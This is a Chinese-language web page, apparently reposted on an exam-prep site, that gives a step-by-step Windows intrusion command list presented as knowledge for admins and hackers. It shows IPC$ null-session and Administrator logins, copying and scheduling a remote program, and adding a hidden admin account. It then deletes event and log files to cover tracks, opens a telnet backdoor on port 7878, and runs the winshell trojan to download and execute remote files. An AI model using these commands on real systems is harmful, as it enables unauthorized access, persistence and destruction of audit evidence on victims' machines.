網絡管理員和黑客都應知道的幾條命令

字號:

考試大軟考站推薦:網絡管理員和黑客都應知道的幾條命令
    常用的幾條NET命令:
    (與遠程主機建立空管連接) net use file://IP/地址\ipc$ "" /use:""
    (以管理員身份登錄遠程主機) net use file://IP/地址\ipc$ "密碼" /use:"Administrator"
    (傳送文件到遠程主機WINNT目錄下)copy 本機目錄路徑\程序 file://IP/地址\admin$
    (查看遠程主機時間) net time file://IP/地址
    (定時啟動某個程序) at file://IP/地址 02:18 readme.exe
    (查看共享) net view file://IP/地址
    (查看netbios工作組列表) nbtstat -A IP地址
    (將遠程主機C盤映射為自己的F盤) net use f: file://IP/地址\c$ ""/user:"Administrator"
    (這兩條把自己增加到管理員組): net user 用戶名 密碼 /add
    net localgroup Administrators 用戶名 /add
    (斷開連接) net use file://IP/地址\ipc$ /delete
    掃尾:
    del C:\winnt\system32\logfiles\*.*
    del C:\winnt\ssytem32\config\*.evt
    del C:\winnt\system32\dtclog\*.*
    del C:\winnt\system32\*.log
    del C:\winnt\system32\*.txt
    del C:\winnt\*.txt
    del C:\winnt\*.log
    一、netsvc.exe
    下面的命令分別是列出主機上的服務項目、查尋和遠程啟動主機的“時間任務”服務:
    netsvc /list file://IP/地址
    netsvc schedule file://IP/地址 /query
    netsvc file://IP/地址 schedule /start
    二、OpenTelnet.exe
    遠程啟動主機的Telnet服務,并綁定端口到7878,例如:
    OpenTelnet file://IP/地址 用戶名 密碼 1 7878
    然后就可以telnet到主機的7878端口,進入DOS方式下:
    telnet IP地址 7878 三、winshell.exe
    一個非常小的木馬(不到6K),telnet到主機的7878端口,輸入密碼winshell,當看到CMD>后,可打下面的命令:
    p Path (查看winshell主程序的路徑信息)
    b reBoot (重新啟動機器)
    d shutDown (關閉機器)
    s Shell (執(zhí)行后你就會看到可愛的“C:\>”)
    x eXit (退出本次登錄會話,此命令并不終止winshell的運行)
    CMD> http://.../srv.exe (通過http下載其他網站上的文件到運行winshell的機器上)
    四、3389登陸器,GUI方式登錄遠程主機的